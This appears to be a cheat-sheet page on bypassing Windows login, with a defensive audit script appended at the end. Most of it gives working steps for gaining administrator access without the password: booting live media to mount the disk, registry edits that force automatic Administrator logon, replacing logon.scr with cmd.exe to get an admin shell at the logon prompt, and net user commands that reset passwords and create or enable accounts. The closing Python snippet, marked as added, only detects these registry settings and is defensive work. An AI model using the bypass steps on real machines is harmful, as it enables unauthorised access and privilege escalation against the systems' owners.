Boot from a Linux CD or USB boot media such as System Rescue or BackTrack and mount the filesystem:
$ fdisk -l /dev/hda
$ mount -t ntfs-3g /dev/hda1 /mnt
PS: 'ntfsmount' should not be used because it can cause data loss; use ntfs-3g.
Mounting images:
$ mount /isofile.iso /cdrom -t iso9660 -o loop
$ losetup /dev/loop0 /floppy.img
$ mount /dev/loop0 -o loop /mnt/floppy
Hacking the system registry can put you into the administrator account without knowing or changing the password.
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
; capital "A" in both user names below
"DefaultUserName"="Administrator"
"AltDefaultUserName"="Administrator"

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaveTimeOut"="60"

PS: maybe you also want to change DefaultDomainName & AltDefaultDomainName
net user <some_account>
where <some_account> is one of the users listed by the net user command. An administrator account is always in the Local Group Membership: *Administrators.
Editing the registry without proper admin rights (not in win7):
In c:\windows\system32\, back up logon.scr ("ren logon.scr logon.scr.bak") and replace it with a copy of cmd.exe ("copy cmd.exe logon.scr"). Now reboot and wait 10-15 minutes at the logon prompt. After the DOS box pops up you have administrator privileges and can start regedit.exe to set the AutoAdminLogon value, for example. On NT and some win 2000 versions you can even use the net user command (type net help user for info) to create, view, change etc. user accounts!
Other useful commands
compmgmt.msc
  Computer Management Console. It contains a number of the other consoles.
gpedit.msc
  Group Policy Editor. Windows XP Professional only.
services.msc
  Manages the many services involved in Windows and installed software.
control Ncpa.cpl users
  To run the Users tool in Control Panel (may not work).
net user /ADD "user" /expires:never /passwordchg:no
net user <admin account> new-password
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ScreenSaverGracePeriod"="99999"
Powertoy Tweak UI
Type "net user administrator /active:yes" without the quotes. Then go to switch users and you should see the administrator account. Go on there, and if you plan on keeping it active then put a password on it.
To use the administrator account just once, you don't put a password on it. Or you can also boot in safe mode (F8) to use the admin account.
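A defender-side check for the Winlogon values set above, as an added example that is not part of the original page: it parses a registry export and reports an enabled AutoAdminLogon and an oversized ScreenSaverGracePeriod. The sample export, the function names and the 5-second threshold are assumptions constructed for the illustration.

```python
import re

# Constructed sample: a REGEDIT4-style export containing the values this page sets.
SAMPLE_EXPORT = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
"DefaultUserName"="Administrator"
"ScreenSaverGracePeriod"="99999"

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaveTimeOut"="60"
'''

WINLOGON = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon"
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?:"(?P<str>.*)"|dword:(?P<dw>[0-9a-fA-F]{1,8}))\s*$')
GRACE_LIMIT = 5  # seconds; assumed policy threshold, adjust to the local baseline

def parse_reg(text):
    """Return {lowercased key path: {lowercased value name: str or int}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):  # skip blanks and ';' comments
            continue
        if line.startswith("[") and line.endswith("]"):  # new key section
            current = keys.setdefault(line[1:-1].lower(), {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            val = int(m["dw"], 16) if m["dw"] is not None else m["str"]
            current[m["name"].lower()] = val
    return keys

def audit_winlogon(text):
    """Return a list of findings for the Winlogon values discussed on this page."""
    wl = parse_reg(text).get(WINLOGON, {})
    findings = []
    if str(wl.get("autoadminlogon", "0")) == "1":
        user = wl.get("defaultusername", "<unset>")
        findings.append(f"AutoAdminLogon enabled for {user}")
    grace = wl.get("screensavergraceperiod")
    if grace is not None and str(grace).isdigit() and int(grace) > GRACE_LIMIT:
        findings.append(f"ScreenSaverGracePeriod is {grace}s (limit {GRACE_LIMIT}s)")
    return findings

if __name__ == "__main__":
    for finding in audit_winlogon(SAMPLE_EXPORT):
        print("FINDING:", finding)
```

Run it against an export of the Winlogon key taken from a live or mounted system; an empty result means neither value deviates from the assumed baseline.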